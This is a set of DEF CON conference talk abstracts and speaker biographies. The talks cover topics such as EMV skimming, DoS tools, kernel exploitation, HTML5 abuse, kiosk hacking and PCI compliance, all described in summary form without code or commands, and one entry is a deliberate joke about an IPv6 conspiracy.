When Space Elephants Attack: A DEFCON Challenge for Database Geeks

The Schemaverse is a vast universe found purely within a PostgreSQL database. Control your fleet of ships manually with SQL commands or write AI in PL/pgSQL so they control themselves while you sit back and enjoy the con. This presentation will help my fellow database geeks to understand the game play mechanics used in The Schemaverse so they can compete in the weekend long tournament.



Abstrct, the author of The Schemaverse game, is a hobbyist programmer and data aficionado. While not pretending to have much actual experience with database security in the professional world, he has enjoyed making database systems do ridiculous things since his first SELECT.

return to top

Bosses love Excel, Hackers too.

Remote applications published in companies are around us in the cloud. In this talk we are going to add ICA and Terminal Server Apps to fingerprinting process, automating data analysis using FOCA. It will allow attacker to fingerprinting internal software, internal networks and combine the info in PTR Scanning, evil-grade attacks and command execution trough Excel files. In the end, we are going to play with a tricky feature in security policies about remote excel that will allow hackers to bypass macro restrictions.



Chema Alonso is a Security Consultant with Informatica64, a Madrid-based security firm. Chema holds respective Computer Science and System Engineering degrees from Rey Juan Carlos University and Universidad Politécnica de Madrid. During his more than six years as a security professional, he has consistently been recognized as a Microsoft Most Valuable Professional (MVP). Chema is a frequent speaker at industry events (Microsoft Technet / Security Tour, AseguraIT) and has been invited to present at information security conferences worldwide including Black Hat Briefings, Defcon, Ekoparty and RootedCon – He is a frequent contributor on several technical magazines in Spain, where he is involved with state-of-the-art attack and defense mechanisms, web security, general ethical hacking techniques and FOCA, the meta-data extraction tool which he co-authors.

Twitter: @chemaalonso



Juan Garrido "Silverhack" is a forensics professional who had been working as security consultant the last seven years. He is the writer of two books about Forensic Analysis in Windows Environments and actually works as security consultant in Informatica 64.

return to top

Dust: Your Feed RSS Belongs To You! Avoid Censorship!

Law around the world is trying to control what is published on the Internet. After wikileaks case and HBGary ownage everybody could see how there are many controls that can be used to close a website, a domain name and to cut the communication between the source and the audience. What happened if someone wants to close your blog? Could you send any message to your audience? In this talk we provide you a new way to publish your RSS feeds using P2P networks as a failover system. Dust is "only" a Reader but could manage P2P Feeds, multiples http feeds from the same source, and the most important feature, can migrate from one feed to multiple ones without any effort for all your attendees.



Chema Alonso is a Security Consultant with Informatica64, a Madrid-based security firm. Chema holds respective Computer Science and System Engineering degrees from Rey Juan Carlos University and Universidad Politécnica de Madrid. During his more than six years as a security professional, he has consistently been recognized as a Microsoft Most Valuable Professional (MVP). Chema is a frequent speaker at industry events (Microsoft Technet / Security Tour, AseguraIT) and has been invited to present at information security conferences worldwide including Black Hat Briefings, Defcon, Ekoparty and RootedCon – He is a frequent contributor on several technical magazines in Spain, where he is involved with state-of-the-art attack and defense mechanisms, web security, general ethical hacking techniques and FOCA, the meta-data extraction tool which he co-authors.

Twitter: @chemaalonso



Juan Garrido "Silverhack" is a forensics professional who had been working as security consultant the last seven years. He is the writer of two books about Forensic Analysis in Windows Environments and actually works as security consultant in Informatica 64.

return to top

IP4 TRUTH: The IPocalypse is a LIE

There is a long tradition of researchers presenting at security conferences on topics that are embarrassing to a large company or government agency: ATM hacking, router vulnerabilities, Massachusetts toll road RFIDs, etc. Many of these brave researchers risk lawsuits or career ruin to reveal the truth. THIS is the first talk that puts the presenters' very lives in peril. Much has been made of the so-called "IPv4 address exhaustion" problem, also known as the IPocalypse. Industry analysts, networking vendors, regulatory groups, think-tanks, and so on have insisted that migration to IPv6 is the only solution. However, a small group of dissenters insist that threat is exaggerated and, more importantly, that the "migration plan" is merely a scheme to increase revenue for the network equipment manufactures and overpriced consultants.



The full truth is that IPv6 is the result of an international cabal on the verge of controlling the world. For centuries, mystics have prophesied that this "migration" would be the cabal's turning point. Incontrovertible evidence will be presented to convince all in attendance. Numerological analysis, ancient texts, and intercepted communiqués are just a few examples. Due to threats against their families, the presenters have been forced to take on assumed identities and appear only in disguise.



Sterling Archer , codename "Duchess", is the world's most deadly secret agent, master of the honeypot operation, and inventor of the tactical turtleneck. He has been an ISIS field agent for 14 years and is in the DANGER ZONE.



Twitter: @s__archer



Prof. Hubert Freaksworth's bio is somewhere. Everything's like somewhere. Currently this bio is free form. All of this fitting in this machine is seriously freaked up.

return to top

Security When Nano Seconds Count

There's a brave new frontier for IT Security - a place where "best practices" does not even contemplate the inclusion of a firewall in the network. This frontier is found in the most unlikely of places, where it is presumed that IT Security is a mature practice. Banks, Financial Institutions and Insurance Companies. High Speed Trading, High Frequency Trading, Low Latency Trading, Algorithmic Trading -- all words for electronic trades committed in microseconds without the intervention of humans. There are no firewalls, everything is custom and none of it is secure. It's SkyNet for Money and it's happening now.



Speaker , CISA, is Principal at Push The Stack Consulting providing security consulting services to the utility and financial verticals. He has been involved with implementing a practical level of information security in Fortune 500, TSE 100, and major public-sector corporations for more than 15 years. James is also a contributing analyst with Securosis, founder of the think|haus hackerspace and has a recurring column on Liquidmatrix Security Digest. Best described as: "Infosec geek, hacker, social activist, author, speaker, and parent." His areas of interest include organizational change, social engineering, blinky lights and shiny things.



Twitter: @myrcurial

return to top

Beat to 1337: Creating A Successful University Cyber Defense Organization

A university with no prior CTF experience and no students with significant prior information security experience may find competition a daunting task. Most competitions require a large amount of technical knowledge to set up, along with a fair amount of organization. But how are students with no information security knowledge going to compete in CTF competitions and keep from getting completely owned? Well, the answer is, they're not. The most important step to successful competition is educating oneself.



In this presentation, we describe our efforts as a team of undergraduate students interested in creating our school's cyber defense organization and beginning to participate in CTF competitions. We introduce the methodologies that we used (and continue to use) in order to start educating and motivating bright students about information security and keep them interested.



We will use our personal experience and proven successful tactics to outline the necessary steps to take and to expose the commonly overlooked necessities of starting a cyber defense organization, regardless of if you are a student interested in information security, an advisor looking to motivate students, an alumnus looking to share your passion for information security, etc.



Information security education must continue outside the classroom. Although the demand for information security knowledge is high, the requirements are rigid. While the industry is growing very rapidly, students who do not show passion and dedication to the field, and deep practical knowledge will be quickly left behind. We aim to leave you armed and ready to compete with and learn from some of the best and brightest information security students in the world.



Mike Arpaia is a Junior in the CyberSecurity program at Stevens Institute of Technology and is a co-founder of the Stevens Cyber Defense Team. Mike works as a Security Consultant/Penetration Tester Intern at Gotham Digital Science LLC. His primary interests are in web application security and exploitation.



Ted Reed was a student interested in cyber-security. Now he likes model planes and simulation.

return to top

Pillaging DVCS Repos For Fun And Profit

Distributed Version Control Systems, like git are becoming an increasingly popular way to deploy web applications and web related resources. Our research shows these repositories commonly contain information very useful to an attacker. This talk, which was part of my small contribution to the Penetration Testing Execution Standard (PTES) will demonstrate how to identify these repositories and techniques to pillage just as much information as possible from them. Lastly there will be release of a toolkit to automate the the discussed techniques supporting git, hg and bzr repositories!



Adam Baldwin has over 10+ years of mostly self taught computer security experience and currently is the co-founder and Chief Pwning Officer at nGenuity focusing on security of web applications. He at one time possessed a GCIA and if his CPE's are up to date should still have a CISSP. Prior to starting nGenuity Adam worked for Symantec. Adam is a minor contributor to the W3AF project and has previously spoke at Toorcamp, Djangcon 2010, and JSconf 2011.

return to top

Chip & PIN is Definitely Broken

The EMV global standard for electronic payments is widely used for inter-operation between chip equipped credit/debit cards, Point of Sales devices and ATMs.



Following the trail of the serious vulnerabilities published by Murdoch and Drimer's team at Cambridge University regarding the usage of stolen cards, we explore the feasibility of skimming and cloning in the context of POS usage.



We will analyze in detail EMV flaws in PIN protection and illustrate skimming prototypes that can be covertly used to harvest credit card information as well as PIN numbers regardless the type/configuration of the card.



The attacks are believed to be unreleased so far to the public (which however does not mean fraudster are not exploiting them) and are effective in bypassing existing protections and mode of operations.



As usual cool gear and videos are going to be featured in order to maximize the presentation.









return to top

Deceptive Hacking: How Misdirection Can Be Used To Steal Information Without Being Detected

There are many similarities between professional hackers and professional magicians. Magicians are experts in creating deception, and these skills can be applied when penetrating a network. The author, with 30 years experience in both security and magic, will explain the basic principles and theories magicians that use to create illusions. This includes definitions of magic terms such as gaff, gimmick, fake, stooge, feint, sleight, bluff, timing, and different types of misdirection. It will be shown that all of these techniques apply to hacking as well. A scenario is presented where normal hacking techniques would be detected and information theft is prevented. The only solution is to use deception and trickery.



Bruce "Grymoire" Barnett has been a scientist at a large Fortune 50 company for 25 years, with a focus on security and advanced algorithms. Some of the tools, developed for military contractors, dealt with attack trees and vulnerability chains (NOOSE – Networked Object-Oriented Security Examiner). Other projects include data provenance, steganography, key management algorithms for sensor networks, and advanced network analysis. He has also written several tutorials on Unix shell scripting, and Google ranks his Sed tutoral as #1. Bruce has been a part-time professional magician for 35 years, and belongs to societies such as the International Brotherhood of Magicians, and the Society of American Magicians. He currently runs several forums exclusively for magicians, such as the Electronic Grymoire, and the Shadow Network.

Twitter: @grymoire

Facebook: http://www.facebook.com/home.php#!/profile.php?id=1593769945&v=info

return to top

Fingerbank — Open DHCP Fingerprints Database

The presentation will first take a step back and offer a basic reminder of what passive fingerprinting is and, more precisely, DHCP fingerprinting. Then we will offer defensive and offensive use cases for DHCP fingerprinting. Next, we will cover the goals and resources offered by the new project and some future plans. As part of the announcement, two large fingerprint databases will be made available (both of which were bundled in separate projects: PacketFence and Satori).



We hope this new resource will increase the quality and breadth of current DHCP fingerprint databases and increase adoption for this reliable fingerprinting technique.



Olivier Bilodeau is a System Architect at Inverse developing PacketFence an open source Network Access Control (NAC) software. He also lectures on system security at …cole de technologie superieure University (ETS) in Montreal, Canada. His past experiences made him travel into dusty Unix server rooms, obfuscated perl code and expensive enterprise networks. On his free time he enjoys several CTFs a year (with the CISSP Groupies and Amish Security teams), hacking perl, doing open source development and brewing beer. You can read his occasional blog posts at: http://www.bottomlesspit.org/

Twitter: @packetfence

return to top

PacketFence, The Open Source Nac: What We've Done In The Last Two Years

Ever heard of PacketFence? It's a free and open source Network Access Control (NAC) software that's been out there since 2005. In the last two years we had several major releases with important new features that makes it an even more compelling solution.



Trying to appeal to both attackers and defenders, this presentation will cover all of our NAC's secret sauce : Wired / Wireless RADIUS MAC authentication / 802.1X, port-security through SNMP, captive portal redirection techniques, hardware support procedure, voice over IP, FreeRADIUS, Snort and Nessus integration, and quarantine / remediation features. We will continue with the advantages of Open Source when dealing with a NAC. Then we will focus on the last two years of the project, the problems, the missteps and the good, new and shiny stuff. This will include learning about some 802.1X problems, complaining about other vendor's code, looking at our own problems and salivating on some of the technical prowess we recently achieved. Finally we will expose our World Domination Roadmap covering both short-term improvements and potential research projects (and we will beg for help to achieve it).



Hopefully this talk will demystify NACs by explaining in details how our implementation works, give yet another example of why open source rocks and convince those who haven't jumped on the NAC band-wagon to give the free one a try.



Olivier Bilodeau is a System Architect at Inverse developing PacketFence an open source Network Access Control (NAC) software. He also lectures on system security at …cole de technologie superieure University (ETS) in Montreal, Canada. His past experiences made him travel into dusty Unix server rooms, obfuscated perl code and expensive enterprise networks. On his free time he enjoys several CTFs a year (with the CISSP Groupies and Amish Security teams), hacking perl, doing open source development and brewing beer. You can read his occasional blog posts at: http://www.bottomlesspit.org/

Twitter: @packetfence

return to top

Federation and Empire

Federated Identity is getting prevalent in corporate environments. True, solving cross domain access control to Web applications or services is a nagging issue. Today, unsatisfying traditional approaches based on duplicated user accounts or dangerous trust domain relationships are being replaced by neater solutions. One of them is getting more and more popular not only in academic but in corporate environments as well: Claims-based authorization relying on SAML tokens. This cross domain federated Web SSO solution allows applications or service providers to finely control their access while leaving the burden of users management to their authoritative domains. Authoritative domains also keep full control on what they disclose about their users: Very attractive. However most existing material explains developers how to leverage this technology while keeping them oblivious to the underlying protocols or (many) standards' complexity and intricacies. By taking a radically low level approach, API free, this talk is intended to security pen-testers or architects who have to cope with SAML based access control. The just necessary presentation of the standards involved will be given. Then the two main parts will focus on how to adapt existing tool set to be fully operational against SAML access control and to key aspects that need to be considered prior joining or creating such federation. Most of the points are implementation agnostic and can be applied to Shibboleth, SimpleSAMLPHP or Active Directory Federation Service for instance. As well, the presented tools are Burp Pro Extensions leveraging the Buby framework but can be easily be translated into everyone preferred toolset.



Emmanuel Bouillon has been working in the Information Security field for more than a decade. Most of these years were spent as an InfoSec expert within the French Atomic Energy Commission where he was in charge of a technical team dedicated to information security. Among its missions were incident handling, vulnerability assessment and penetration testing. Since 2009, Emmanuel Bouillon lives in the Netherlands working for an international organization as a Senior Information Assurance Scientist. His work is mainly focused on Cyber Defense issues. Emmanuel Bouillon has been a speaker in international conferences like PacSec, BlackHat, Hack.lu, #days, has written several articles in IT/Security magazines and was a teacher on network and system security in various French postgraduate schools. He holds a renewed ISO/CEI 27001:2005 Auditor certification and is credited for several responsibly disclosed vulnerabilities (CVE-2010-{0283,2229,2914,2941}, CVE-2011-{0001,...})

return to top

Three Generations of DoS Attacks (with Audience Participation, as Victims)

Denial-of-service (DoS) attacks are very common. They are used for extortion, political protest, revenge, or just LULz. Most of them use old, inefficient methods like UDP Floods, which require thousands of attackers to bring down a Web server. The newer Layer 7 attacks like Slowloris and Rudy are more powerful, and can stop a Web server from a single attacker with incomplete Http requests. The newest and most powerful attack uses IPv6 multicasts, and can bring down all the Windows machines on an entire network from a single attacker.



I will explain and demonstrate these tools: Low Orbit Ion Cannon, OWASP Http DoS Tool, and flood_router6 from the thc-ipv6 attack suite. This deadly IPv6 Router Advertisement Flood attack is a zero-day attack--Microsoft has known about it since June 2010 but has not patched it yet (as of May 4, 2011).



Audience Participation: Bring a device to test for vulnerability to the Router Advertisement Flood! Some cell phones and game consoles have been reported to be vulnerable--let's find out! If your device crashes, please come to the Q&A room so we can video-record it and arrange disclosure to the vendor.



Sam Bowne has been teaching computer networking and security classes at CCSF since 2000. He has given talks at DEFCON, Toorcon and BayThreat, and taught classes and seminars at many other schools and teaching conferences.



Sam has a B.S. in Physics from Edinboro University of Pennsylvania and a Ph.D. in Physics from University of Illinois, Urbana-Champaign. His Industry Certifications are: Associate of (ISC)^2, Certified Ethical Hacker, Microsoft: MCP, MCDST, MCTS: Vista; Network+, Security+, Hurricane Electric IPv6 Guru, CCENT.

Twitter: @sambowne

return to top

Building The DEF CON Network, Making A Sandbox For 10,000 Hackers

We will cover on how the DEF CON network team builds a network from scratch, in three days with very little budget. How this network evolved, what worked for us, and what didn't work over the last ten years. This network started as an idea, and after acquiring some kick butt hardware, has allowed us to support several thousand users concurrently. In addition I will cover the new WPA2 enterprise deployment, what worked, and what didn't, and how the DEF CON team is has mad the Rio network rock!



David M. N. Bryan has 10 years of computer security experience, including pentesting, consulting, engineering, and administration. As an active participant in the information security community, he volunteers at DEF CON, where he designs and implements the firewall and network for what is said to be the most hostile network environment in the world. This network allows speakers, press, vendors, and others to gain access to the Internet, without being hacked. In his spare time he runs the local DEF CON group, DC612, is the president of Twincities Makers group, and participates in the Minneapolis OWASP chapter.



Twitter: @videoman



Luiz Eduardo is the Director of SpiderLabs Latin America Countries. With almost 20 years of experience, throughout his career he has worked with possibly all types of networking technologies on the enterprise and service provider sectors, as well as the security involved in these technologies.



Luiz is the founder of the y0u Sh0t the Sheriff security conference held in Brazil and has worked on the wireless infrastructure of Blackhat, DEF CON, Computer Chaos Congress and Shmoocon. As a public speaker, he has given presentations on diverse infosec topics at worldwide on conferences such as DEF CON, FIRST, H2HC, HitB Malaysia, Layerone, ShmooCon, BlueHat, ThotCon, Toorcon and others. Luiz holds the following certifications: CWNE, CISSP, GISP, GCIH and CEH.

return to top

Kinectasploit: Metasploit Meets Kinect

We've all seen hackers in movies flying through 3D worlds as they hack the gibson. How about trying it for real? Now that we've got the kinect, lets hook it up to some hacking tools and see what it looks like to hack via kinect!



Jeff Bryner has 20 years of experience integrating systems, fixing security issues, performing incident response and forensics. He writes for the SANS forensic blog, has spoken at RSA on SCADA security issues, DEFCON 18 on the google toolbar and runs p0wnlabs.com just for fun.

Twitter: @p0wnlabs

return to top

Physical Memory Forensics for Cache

Physical memory forensics has gained a lot of traction over the past five or six years. While it will never eliminate the need for disk forensics, memory analysis has proven its efficacy during incident response and more traditional forensic investigations. Previously, memory forensics, although useful, focused on a process' address space in the form of Virtual Address Descriptors (VADs) but ignored other rich sources of information. In the past, some techniques of process reconstitution have been auspicious at best and erroneous at worst. This presentation will build upon lessons learned and propose more thorough ways to reconstruct process contents, and therefore a process' address space. By using the methods presented, it will be possible to further reduce the data you care about in an incident response or forensic investigation and to better apply the traditional computer security techniques such as reverse engineering, hash matching, and byte pattern or signature matching such as those provided by ClamAV and VxClass.



Jamie Butler Bio to come.

return to top

Metasploit vSploit Modules

This talk is for security practitioners who are responsible for and need to test enterprise network security solutions. Marcus Carey, David Rude, and Will Vandevanter discuss how to use the Metasploit Framework beyond penetration testing to validate whether security solutions are working as expected. Marcus initiated the creation vSploit auxiliary modules that emulate real-world network attacks. This can be used for good and evil purpose. This talk will debut several Metasploit modules designed specifically for testing firewalls, IDS, IPS, and DLP solutions. This presentation will show how to emulate persistent network attacks with vSploit modules which can come in handy if you are a penetration tester.



Marcus J. Carey is the Enterprise Security Community Manager at Rapid7. Marcus has over 17 years experience in information assurance experience working in the DoD as well as Federal and State Government organizations. Marcus holds a M.S. in Network Security From Capitol College as well as several security related certifications.

Twitter:@ifail



David Rude is a Metasploit Exploit Developer at Rapid7. David writes code that executes code. David has worked for years as a professional security researcher. He has a fascination with finding and exploiting vulnerabilities. At Rapid7, David currently works as a developer who writes exploits and codes awesomeness for Metasploit Framework, Metasploit Express, and Metasploit Pro.

Twitter:@msfbannedit



Will Vandevanter is a senior penetration tester at Rapid7. His focus interests include web application security, DoS attacks, and secure code. He has a Masters degree in Computer Science (focus in Secure Software Engineering) and a BSc with joint majors in Computer Science and Mathematics.

Twitter: @willis__





return to top

Lives On The Line: Securing Crisis Maps In Libya, Sudan, And Pakistan

Crisis maps collect and present open source intelligence (Twitter, Facebook, YouTube, news reports) and direct messages (SMS, email) during disasters such as the Haiti earthquake and civil unrest in Africa. The deployment of crisis mapping technology is on its way to becoming a standard tool to collect and track ground truth from crisis zones, but very little work has been done to evaluate and mitigate the threat posed by adversaries with offensive infosec capabilities. These platforms can provide responders and humanitarian organizations with the timely, high fidelity situational awareness necessary to direct aid and save lives. Unfortunately, they can also provide hostile national security services and other malicious groups with the information they need to target vulnerable populations, hunt down individuals, and manipulate response operations. In this session we'll setup, operate, attack and defend an online crisis map. Bring your laptop and toolsets because you will have the opportunity to play the bad actor (a technical member of the secret police or terrorist organization) as well as the defender (the response agency, citizen on the ground, and sysadmin trying to keep the server online). The experience will bring together everything we know and love and hate about defending online systems including buggy code, naive users, and security vs. usability tradeoffs and do so in a situation where people are dying and the adversary controls the network. We'll also introduce some not-so-typical concepts like building trust on the fly, crowdsourced verification, and maintaining situational awareness from halfway around the globe. Each step in the process will be based on real-world deployment experiences monitoring everything from local riots to nation-wide revolutions and natural disasters. The lessons learned, vulnerabilities found, and exploits developed during the session will be taken back to the crisis mapping community - enabling them to build more secure systems and more effective, life-saving deployments.



George Chamales has spent the last decade working in almost every legal permutation of employer / job the computer security field has to offer. His list of current and former government employers includes DOD, DOE, DHS, and DOI. In the private sector, he's worked as a security architect, member of the Honeynet Project, and corporate pen-tester targeting Fortune 500 companies. He is an active member of the crisis mapping community, where he develops new tools and capabilities, co-founded the Crisis Mappers Standby Task Force, and has served as the technical lead for numerous deployments including LibyaCrisisMap.net, Pakreport.org, and SudanVoteMonitor.com.

return to top

Abusing HTML5

The spike of i{Phone, Pod Touch, Pad}, Android, and other mobile devices that do not support Flash has spurred the growth and interest in HTML5, even though the standard is still evolving. The power of HTML5 allows developers to create almost full-fledged web applications, not just structured content. HTML5's new features has increased the attack surface. It has been demonstrated that the HTML5 offline application cache can be abused. In addition, the support for client-side storage will open up the opportunity for SQL injection attack on client machines. There has been chatter regarding the new attack opportunities that the <audio>, <video>, and <canvas> tags will present, considering they require JavaScript and image-related functions such as SVG. This presentation will demonstrate the issues of HTML5 and how they can be abused and mitigated with good-old techniques. This presentation will also delve into the writing malicious web pages with web workers, abusing cross-origin JavaScript requests, how not to do cross-document messaging, and abusing geolocation.



Ming Chow is a Lecturer at the Tufts University Department of Computer Science. His areas of interests are computer security, game development, web application security, and Computer Science in Education. He was also a web application developer for ten years at Harvard University for University Operations Services. Ming co-edited a special issue of IEEE Security & Privacy on securing online games with Gary McGraw of Cigital, Inc. published in May 2009. Ming is a frequent guest speaker and have spoke at numerous organizations, including the New England Chapter of the High Technology Crime Investigation Association (HTCIA-NE), the Greater Boston Chapter of the Association of Certified Fraud Examiners (ACFE), the Massachusetts Office of the Attorney General (AGO), and OWASP. Ming mentored a team of students from Tufts to the Microsoft Imagine Cup Game Design Competition US Finals in 2010. Finally, Ming is a SANS GIAC Certified Incident Handler (GCIH).

Twitter: tufts_cs_mchow





return to top

Familiarity Breeds Contempt

"Good programmers write code, great programmers reuse" is one of the most well known truisms of software development. But what does that mean for security? For over 30 years software engineering has focused on writing the perfect code and reusing it as often as they can, believing if they can just get the bugs out, the system will be secure. In our talk we will demonstrate how the most prominent doctrine of programming is deadly for security. Analysis of software vulnerability data, including a full decade of data for several versions of the most popular operating systems, server applications and user applications (both open and closed source), shows that properties extrinsic to the software play a much greater role in the rate of vulnerability discovery than do intrinsic properties such as the actual software quality. We show that (at least in the first phase of a product's existence), software vulnerabilities have different properties from software defects. Our analysis of attacker tools and popular exploits shows that the attacker's learning curve determines when and which particular products are likely to be attacked. Improvements in those tools affect the frequency of attack, and the ultimate result is point-and-click usability. We will present several examples from both the defender and the attacker perspective illustrating how dangerous familiarity is for security. We will demonstrate that the more familiar an attacker is with your product, the more likely you are to be attacked and the more likely an attacker will succeed.



Sandy Clark (Mouse) has been taking things apart since the age of two, and still hasn't learned to put them back together. An active member of the Hacker community, her professional work includes an Air Force Flight Control Computer, a simulator for NASA and singing at Carnegie Hall. She is currently fulfilling achildhood dream, pursuing a Ph.D. in Computer Systems and Security at the University of Pennsylvania.



Her research explores the vulnerability lifecycle, human scale security and the unexpected ways that systems interact. A founding member of Toool-USA, she also enjoys puzzles, toys, Mao (the card game), and anything that involves night vision goggles.



Brad Haines (RenderMan) is a Whitehat by trade, Blackhat by fashion. A very visible and well known member of the wardriving and hacker community, he does whatever he can to learn how things work, how to make them better and to teach people the same. A firm believer in the hacker ethic of openess , sharing, and collaboration. Never afraid to try something new, he can usually be found taking unnessecary risks for the sake of the experience.



Author of several computer security books and a frequent presenter at hacker, security and privacy conferences, he can usually be found investigating something interesting, scanning the air for any WiFi data, and trying to find new and interesting beers.

Twitter: @Ihackedwhat

return to top

Operational Use of Offensive Cyber

This session will discuss the "Art of the Possible" when it comes to "Offensive Cyber Operations" and why it is so important for both military and non-military cyber professionals to understand each others perspectives on "Offensive Cyber Operations". Discussion will focus on the military's planning process and how the potential introduction of offensive cyber operations could effect the process and why information sharing events sessions like "DEFCON" are so important to its eventual success.



Christopher Cleary is a former Computer Network Operations Planner from US CYBER COMMAND who led an Operational Planning Team focused on studying "Advanced Persistent Threats" to DoD network. During his tenure at CYBERCOM he was one of the few Officers to lead a forward deployed element supporting combat operations in the CENTCOM AOR. Mr. Cleary is currently employed by Sparta Inc. opa Cobham Analytic Solutions directing Cyber Strategy and Policy.

return to top

Look At What My Car Can Do

This presentation is an introduction to the new world of automobile communication, data and entertainment systems, highlighting the Ford Sync System.



The Ford Sync System is a remarkable technological advance that has changed the automobile industry. While hard drives have been used in automobile entertainment applications for some time now, the Ford Sync System is different. It allows the user to interact with the car's communication system in a brand new way. If a vehicle with the Ford Sync system is used to commit a crime or to hide data, how would examiners be able to determine what data might be contained in the Ford Sync System? How does it get there? What forensic process or type of exploitation can be used to determine what traces are left behind on the car's hard drive? This presentation will take the audience through the process of various methods of infilling, hiding, acquiring data, and conducting a forensic exam on the Ford Sync System.



Tyler Cohen is known in the digital forensic community for her work with forensics on alternate media devices and has given presentations at conferences all over the country on the topic, including the Defense Cybercrime Conference, High Tech Crime Investigation Association, Defcon, TechnoSecuity, Technoforensics, and the California District Attorney Association. She has co-authored a book entitled Alternate Data Storage Forensics (ISBN – 13: 978-1-59749-163-1) and was featured in Best Damn Cybercrime and Digital Forensics Book Period (ISBN-13: 978-1-59749-228-7). She currently works for the Department of Defense. Prior to that she worked for General Dynamics, assigned to the Department of Defense Cyber Crime Center (DC3) where she was a lead digital forensic examiner. Here she used her expertise in intrusion analysis and major crimes to successfully complete digital forensic exams. Before joining DC3, she was employed at ISS/IBM as an emergency incident responder and forensic examiner where she also showcased her expertise in intrusion analysis, major crimes and PCI standards. Prior to that, she worked for NASA as a Computer Forensic Examiner under the computer crimes division for the Inspector General.

return to top

Kernel Exploitation Via Uninitialized Stack

Leveraging uninitialized stack memory into a full-blown root escalation is easier than it sounds. See how to find these vulnerabilities, avoid the pitfalls of priming the stack, and turn your "memory corruption" into full root privileges.



Kees Cook is part of the Ubuntu Security Team, where he tries to harden Ubuntu in particular, and Linux in general, against attack. In addition to being an Ubuntu developer, he's a member of the Ubuntu Technical Board, a Debian Developer, and a Kernel.org admin. As a long-time DEF CON Capture the Flag participant, he's especially proud of being part of Team 1@stPlace and winning in 2006 and 2007.



Twitter: @kees_cook

return to top

The Art and Science of Security Research

Research is a tricky thing, full of pitfalls, blind alleys, and rich rewards for the individual and humanity. This talk studies the art and science of conducting security research, from the genesis of your idea through experimentation and refinement to publication and beyond. In this talk you will learn how to generate and select powerful ideas, build upon the work of others, conduct groundbreaking work, and share your results for maximum desired effect. Whether you are a lone researcher or part of a large cabal you will take away ideas and techniques for maximizing the impact of your work, lest it lay dormant or have someone else rediscover your idea several years later.



Greg Conti is an Academy Professor and Director of West Point's Cyber Security Research Center. He is the author of Security Data Visualization (No Starch Press) and Googling Security (Addison-Wesley) as well as over 40 articles and papers covering online privacy, usable security, security data visualization, and cyber warfare. His work can be found at www.gregconti.com and www.rumint.org.

return to top

Internet Kiosk Terminals : The Redux

Paul Craig is the self-proclaimed "King of Kiosk Hacking" You have likely heard of him or his pornographic tool iKAT (Interactive Kiosk Attack Tool). For the last 3 years he has dedicated his life to striking fear into the hearts of Kiosk vendors.



This talk will compromise all of his latest advancements in the field of hacking Kiosk terminals. Multiple platforms, vendors, technologies and more shells than you can shake a stick at. If you have ever wanted to hack that lonely web-browsing computer in the corner of a room, this is the talk for you.



This talk will also showcase a live freestyle Kiosk hacking session, with a truck load of slick ninja techniques and zero-day. Watch out — the King of Kiosk hacking is back in town.



Paul Craig works at Security-Assessment.com with a bunch of some of the best hackers in the world.



Paul lives for hacking, it's in his blood! From the age of 13 he has have been addicted to popping shells, stealing access and escalating privileges. He loves his job and is fully committed to the trade.

return to top

Cipherspaces/Darknets: An Overview Of Attack Strategies

Darknets/Cipherspaces such as Tor and I2P have been covered before in great detail. Sometimes it can be hard to follow attack strategies that have been used against them as the papers written on the topic have been academic and abstract. What this talk will attempt to do is step back and give an overview of the topic in a manner hopefully more conducive to the understanding of security practitioners, giving more concrete examples. While little to nothing in this talk will be "new and groundbreaking" it should lead to a better understanding of how encrypted anonymizing networks can be subverted to reveal identities.



Adrian Crenshaw has worked in the IT industry for the last thirteen years. He runs the information security website Irongeek.com, which specializes in videos and articles that illustrate how to use various pen-testing and security tools.

Twitter: @irongeek_adc

return to top

Speaking with Cryptographic Oracles

Cryptography is often used to secure data, but few people have a solid understanding of cryptography. It is often said that if you are not strictly a cryptographer, you will get cryptography wrong. For that matter, if you ARE a cryptographer, it is still easy to make mistakes. The algorithms might be peer reviewed and unbroken for 15 years, but if you use them incorrectly, they might leak information. Cryptographic oracles are systems which take user-controlled input and leak part or all of the output, generally leading to an attacker being able to defeat the cryptography, in part of in whole. In this talk, methods for finding and exploiting encryption, decryption, and padding oracles with minimal cryptographic knowledge will be discussed.



Daniel Crowley is an Application Security Consultant for Trustwave's SpiderLabs team. He has been working in the information security industry for over 6 years and has been focused on penetration testing, specifically on Web applications. Daniel is particularly interested in vulnerabilities caused by a failure to account for little known or even undocumented properties of the platforms on which applications run. He especially enjoys playing around with Web based technologies and physical security technologies and techniques. Dan also rock climbs and makes a mean chili.

Twitter: @dan_crowley.

return to top

Taking Your Ball And Going Home; Building Your Own Secure Storage Space That Mirrors Dropbox's Functionality

When for-profit companies offer a free app, there is always going to be strings attached. As we have increasingly seen, these strings are often tied to your privacy to enable said third party company to monetize you in some way, but in worse cases your security can be compromised leaving you open to identity theft at best or legal repercussions at worst. One of today's most ubiquitous apps is Dropbox, which operates as a file hosting service that uses "cloud computing" (aka the internet) to enable users to store and share files and folders with others using file synchronization. Sounds harmless enough until you start thinking about how they can do so much for free. Learn about the flaws discovered by security researchers that have caused Dropbox to significantly change their terms of service, and about a group building a free, open sourced option for anyone to use to share and protect their data with. Learn, get involved, help and CYA, because for-profit third party companies are not going to do it for you.



Phil Cryer (fak3r) is a systems engineer and privacy advocate who has worked on Linux and open source solutions for over 10 years. While balancing security with openness he has lectured globally on ways to open data silos to facilitate scientific discovery, but is equally comfortable talking about sharing any kind of data. His favorite memory from previous DEFCONs was yelling at the screen during a late night screening of Wargames, but locking himself out of his own room at last year's con is a close second. He learns by doing, believes that imagination is more important than knowledge, and like all good IT professionals, has a bachelor degree in fine arts.

Twitter: @fak3r

return to top

PCI 2.0: Still Compromising Controls and Compromising Security

Building on last year's panel discussion of PCI and its impact on the world of infosec, we are back for more- including "actionable" information. Having framed the debates in the initial panel, this year we will focus on what works, what doesn't, and what we can do about it.



Compliance issues in general, and PCI-DSS in particular, are driving security in many organizations. In tight financial times, limited security resources are often exhausted on the "mandatory" (compliance) at the expense of the "optional" (actual security). We will focus on the information needed to reconcile these issues, and encourage the audience to continue the discussion with us.



Jack Daniel is old, and has a Unix Beard, so people mistakenly assume he knows stuff. He still makes no attempt to correct this gross misunderstanding. Jack has proven himself to be an inciteful moderator on compliance topics. He has many years of network and systems administration experience, and a bunch of letters after his name. Jack lives and breathes network security as Product Manager for Tenable.



